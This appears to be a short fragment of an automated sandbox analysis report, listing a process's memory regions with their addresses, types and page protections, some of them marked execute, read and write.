2EAD000
unkown
page execute and read and write
26A87990000
unkown
page execute and read and write
6ED507B000
stack
page read and write
27618E32000
heap
page read and write
2BAA7A50000
unkown
page read and write
2BAACB60000
unkown
page read and write
There are 2617 hidden memdumps, click here to show them.